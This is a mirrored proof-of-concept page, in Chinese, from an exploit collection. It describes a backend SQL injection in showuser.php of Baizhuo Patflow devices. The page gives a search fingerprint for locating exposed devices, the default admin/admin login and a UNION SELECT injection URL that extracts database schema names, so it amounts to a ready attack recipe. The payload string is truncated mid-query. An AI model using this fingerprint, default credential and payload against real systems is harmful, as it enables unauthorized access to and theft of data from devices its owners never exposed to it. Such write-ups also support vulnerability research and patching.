mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
33 lines
616 B
Markdown
33 lines
616 B
Markdown
# 百卓 Patflow showuser.php 后台SQL注入漏洞
|
||
|
||
## 漏洞描述
|
||
|
||
百卓 Patflow showuser.php文件参数过滤不充分,导致后台存在SQL注入漏洞
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
百卓 Patflow
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
"Patflow"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
登录页面
|
||
|
||

|
||
|
||
默认口令登录后台 admin/admin
|
||
|
||
存在漏洞的文件为 shwouser.php,验证POC为
|
||
|
||
```
|
||
/user/showuser.php?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,(select%20group_concat(SCHEMA_NAME)%20f
|
||
```
|
||
|
||
 |